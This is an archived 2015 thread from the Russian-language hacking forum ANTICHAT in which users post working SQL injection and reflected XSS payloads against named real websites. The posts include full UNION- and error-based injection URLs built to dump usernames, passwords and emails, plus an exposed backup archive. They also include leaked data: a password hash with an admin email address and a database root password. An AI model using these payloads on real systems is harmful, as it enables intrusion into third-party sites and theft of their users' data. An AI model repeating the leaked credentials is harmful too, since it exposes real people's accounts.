ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.09.2015, 14:27
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Сообщение от tipa_cracker
Так и есть.
Код:
Code:
$P$BVX.b8gaC9KdVELsexne9KZawfO70G0 | admin | rusakov1971@inbox.ru
Method: POST
Type: UNION query
Title: MySQL UNION query (random number) - 7 columns
Payload: search=-8718') UNION ALL SELECT CONCAT(0x717a707171,0x7a507250687641477a52,0x7170626a71),1342,1342,1342,1342,1342,1342#&submit_s=
Код:
Code:
define('DB_USER', 'root');
define('DB_PASSWORD', '89039486893');
define('DB_HOST', 'localhost');
|
|
|
29.09.2015, 09:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
51198
Репутация:
3
|
|
Target:
Код:
Code:
_ttp://good-steam.ru/backup.zip .
.
Type:Backup .
|
|
|
|
29.09.2015, 11:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
51198
Репутация:
3
|
|
Target:salrium.ru
Type : XSS - Reflected .
Код:
Code:
salrium.ru/resp_block.php?id_goods=1728083">alert("WH")
или вот так
http://salrium.ru/resp_block.php?id_goods=1728083%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28908717%29%3C/ScRiPt%3E&page=2 .
Можно и так salrium.ru/resp_block.php?id_goods=">alert("WH")
|
|
|
|
29.09.2015, 19:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
51198
Репутация:
3
|
|
Target:_ttp://steam-extra.ru/listing.php?category_id=40049
Type:XSS-Reflected
или
Код:
Code:
'"()&%prompt(916773)
Или свой .
|
|
|
|
06.10.2015, 13:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
1575
Репутация:
1
|
|
|
|
|
|
06.10.2015, 17:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
11344
Репутация:
5
|
|
Вы правы:
Target: archetype.co.uk
Type:SQLi error based
Exploit:
Код:
Code:
Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and extractvalue(0x0a,concat(0x0a,(select concat(version(),0x3a,database(),0x3a,current_user)))) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
DB-name: archetyp_db
DB-user: archetype
Version: 5.1.73-cll
P.S. Возможно есть более изящное решение, но у меня получилось так
UPD Поковыряв руками выяснилось, что пассы в мд5 и в вывод тупо не влазят (ограничение способа в 31 символ). Нашел такое решение (лимит 64 символа):
Код:
Code:
Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
|
|
|
|
13.10.2015, 05:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
32618
Репутация:
1
|
|
Target: http://www.gaspforair.org
Уязвимость:SQLi
Код:
Code:
http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=115 +UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(housing_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,userlevel,0x3a,username,0x3a,password,0x3c62723e))))x),3,4,5--
Target: http://www.sequentialtart.com
Уязвимость:SQLi
Код:
Code:
http://www.sequentialtart.com/article.php?id=-445+UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(seqtartprod.IPM_users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,password,0x3a,email,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Вот прогнал последнюю DirB'ом, удивился: http://www.sequentialtart.com/.bash_history и http://www.sequentialtart.com/.mysql_history
чО уж там, /etc/shadow надо в общий доступ!)))
Добавлю:
Target: http://yrmusic.com
Уязвимость:SQLi
Код:
Code:
http://yrmusic.com/v2/artists/bios/artist.php?ID=-84+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Target: http: http://www.zam.it
Уязвимость:SQLi
Код:
Code:
http://www.zam.it/home.php?id_autore=234 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10 --
Оффтоп про вышеуказанный адрес: параллельно с Лисой (хакбар с Диосами), то ли с бодуна, то ли просто от лени, запустил Havij. Дык вот (это не первое наблюдение), он, не поверите, врет)) Не верьте Havij'у ибо он утверждает, что здесь 2 таблицы, а на самом деле, их 10)) Попробуйте последний адрес через запрос и через сию программулину))
Target: http: http://sh.newsun.dk
Уязвимость:SQLi
Код:
Code:
http://sh.newsun.dk/vis.php?id=189+UNION+ALL+SELECT+1,2,3,4,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),6,7,8--
|
|
|
|
17.10.2015, 12:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
DUS Architects Amsterdam
Type:SQLi
Код HTML:
HTML:
http://www.dusarchitects.com/news.php?newsid=-8%27%20union%20select%201,2,3,version(),5,6,7--+f
ТИЦ 20
PR 5
5.6.23-LOG
|
|
|
|
22.10.2015, 01:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
2236
Репутация:
2
|
|
Target: http://motivtelecom.ru
Type: XSS Reflected
Код:
Code:
motivtelecom.ru/sverdlovsk-oblast/search?search_text=">alert(1)
|
|
|
|
23.10.2015, 10:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
YogaBugs
Type : SQLi
Код HTML:
HTML:
http://www.yogabugs.com/shop_item.php?id=-3%20union%20select%201,2,version(),4,5,6,7,8,9,10,11--+f
PR 3
5.5.44-0ubuntu0.14.04.1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
